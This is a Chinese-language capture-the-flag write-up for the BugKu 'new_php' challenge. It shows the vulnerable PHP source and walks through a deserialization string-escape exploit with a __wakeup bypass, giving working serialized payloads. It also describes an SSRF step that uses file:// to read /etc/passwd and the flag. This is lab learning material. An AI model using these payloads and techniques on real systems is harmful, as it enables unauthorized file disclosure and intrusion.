您现在的位置是:首页 > 技术教程 正文

BugKu-new_php

admin 阅读: 2024-03-16
后台-插件-广告管理-内容页头部广告(手机)

对于web手来说,每天最快乐的事情就是做题了//doge


源码

  1. <?php
  2. // php版本:5.4.44
  3. header("Content-type: text/html; charset=utf-8");
  4. highlight_file(__FILE__);
  5. class evil{//并未被调用
  6. public $hint;
  7. public function __construct($hint){
  8. $this->hint = $hint;
  9. }
  10. public function __destruct(){//利用点?
  11. if($this->hint==="hint.php")
  12. @$this->hint = base64_encode(file_get_contents($this->hint));
  13. var_dump($this->hint);
  14. }
  15. function __wakeup() {//需绕过
  16. if ($this->hint != "╭(●`∀´●)╯") {
  17. //There's a hint in ./hint.php
  18. $this->hint = "╰(●’◡’●)╮";
  19. }
  20. }
  21. }
  22. class User
  23. {
  24. public $username;
  25. public $password;
  26. public function __construct($username, $password){
  27. $this->username = $username;
  28. $this->password = $password;
  29. }
  30. }
  31. function write($data){
  32. global $tmp;
  33. $data = str_replace(chr(0).'*'.chr(0), '\0\0\0', $data);
  34. $tmp = $data;
  35. }
  36. function read(){
  37. global $tmp;
  38. $data = $tmp;
  39. $r = str_replace('\0\0\0', chr(0).'*'.chr(0), $data);
  40. return $r;
  41. }
  42. $tmp = "test";
  43. $username = $_POST['username'];
  44. $password = $_POST['password'];
  45. $a = serialize(new User($username, $password));
  46. if(preg_match('/flag/is',$a))
  47. die("NoNoNo!");
  48. unserialize(read(write($a)));

hint并未被调用,但是flag应该是在hint.php中

要想调用hint需要利用User类中的两个post方法

先生成hint序列化语句

  1. <?php
  2. class evil
  3. {
  4. public $hint;
  5. public function __construct($hint)
  6. {
  7. $this->hint = $hint;
  8. }
  9. }
  10. $a=new evil('hint.php');
  11. echo serialize($a);
  12. //O:4:"evil":1:{s:4:"hint";s:8:"hint.php";}

正常来说User序列化生成的语句是这样的

  1. O:4:"User":2:{s:8:"username";s:5:"admin";s:8:"password";s:6:"123456";}
  2. //当username=admin&password=123456时所生成的语句

当password=O:4:"evil":1:{s:4:"hint";s:8:"hint.php";}时,就变成了

  1. O:4:"User":2:{s:8:"username";s:5:"admin";s:8:"password";s:41:"O:4:"evil":1:{s:4:"hint";s:8:"hint.php";}";}
  2. //username=admin&password=O:4:"evil":1:{s:4:"hint";s:8:"hint.php";}

但只是这样输出的话你放入的序列化语句并不会被执行,而只是当成普通的字符串

我们再看这里

  1. function write($data){
  2. global $tmp;
  3. $data = str_replace(chr(0).'*'.chr(0), '\0\0\0', $data);
  4. $tmp = $data;
  5. }
  6. function read(){
  7. global $tmp;
  8. $data = $tmp;
  9. $r = str_replace('\0\0\0', chr(0).'*'.chr(0), $data);
  10. return $r;
  11. }
  12. ....
  13. unserialize(read(write($a)));

这里判断输入的字符串中是否存在\0\0\0,存在的话会将其替换为chr(0)*chr(0),然后又替换回来

这里让我联想到字符串逃逸,字符串逃逸漏洞是指在程序中由于未正确处理或过滤用户输入的特殊字符而导致的安全漏洞

在这里,当我输入'\0\0\0'的时候,正常情况下是这样的

  1. O:4:"User":2:{s:8:"username";s:6:"\0\0\0";s:41:"O:4:"evil":1:{s:4:"hint";s:8:"hint.php";}";}
  2. //username=/0/0/0&password=O:4:"evil":1:{s:4:"hint";s:8:"hint.php";}

由于在这里有给/0/0/0做过滤,所以就会变成

O:4:"User":2:{s:8:"username";s:6:" * ";s:8:"password";s:41:"O:4:"evil":1:{s:4:"hint";s:8:"hint.php";}";}

这就容易造成字符串逃逸

上面能够明显发现字符是减少的,所以我们只需要多加几个\0\0\0以确保我们传入的O:4:"evil":1:{s:4:"hint";s:8:"hint.php";}能够逃逸出去就行

也就是说,输入的\0\0\0要确保覆盖“;s:8:"password";s:41:"”

这样子序列化语句就变成了

这样就可以执行hint

刚刚上面有个错误

你password传入的值应该为:a";O:4:"evil":1:{s:4:"hint";s:8:"hint.php";}

这样后面的语句才会被看作是序列化语句

抓包尝试

..............

我给这茬忘了

  1. function __wakeup() {
  2. if ($this->hint != "╭(●`∀´●)╯") {
  3. //There's a hint in ./hint.php
  4. $this->hint = "╰(●’◡’●)╮";

绕过wakeup也很简单

我们把O:4:"evil":1:{s:4:"hint";s:8:"hint.php";}改成O:4:"evil":2:{s:4:"hint";s:8:"hint.php";}

ps:__wakeup的其他绕过方法可以参考这位师傅的文章:

绕过__wakeup() 反序列化 合集_wakeup绕过-CSDN博客文章浏览阅读955次。绕过__wakeup() 反序列化 合集_wakeup绕过https://blog.csdn.net/Jayjay___/article/details/132463913?spm=1018.2226.3001.9630.1&extra%5Btitle%5D=%E7%BB%95%E8%BF%87__wakeup%28%29%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%20%E5%90%88%E9%9B%86&extra%5Butm_source%5D=vip_chatgpt_common_pc_toolbar&extra%5Butm_medium%5D=

%20

我们继续

%20

有意思了

访问index.cgi

..................................

有意思

这里用了name进行传参,由此联想到ssrf

尝试

ok,确定存在ssrf

接下来进行利用

估计是做了过滤,我们往file://前面加一个空格试试

因为passwd是linux系统都有的文件且目录固定,所以我一般喜欢去访问这个文件以判断可不可以被利用

ok,正常来说flag保存于根目录和网页同目录的可能性比较大

可以先做下爆破以判断flag的位置

很显然不在网页同目录下

看看根目录是否存在

成功拿到flag


能与诸位师傅们共同成长是我的荣幸

求赞求关注!!!!感谢!!!!

标签:
声明

1.本站遵循行业规范,任何转载的稿件都会明确标注作者和来源;2.本站的原创文章,请转载时务必注明文章作者和来源,不尊重原创的行为我们将追究责任;3.作者投稿可能会经我们编辑修改或补充。

在线投稿:投稿 站长QQ:1888636

后台-插件-广告管理-内容页尾部广告(手机)
关注我们

扫一扫关注我们,了解最新精彩内容

搜索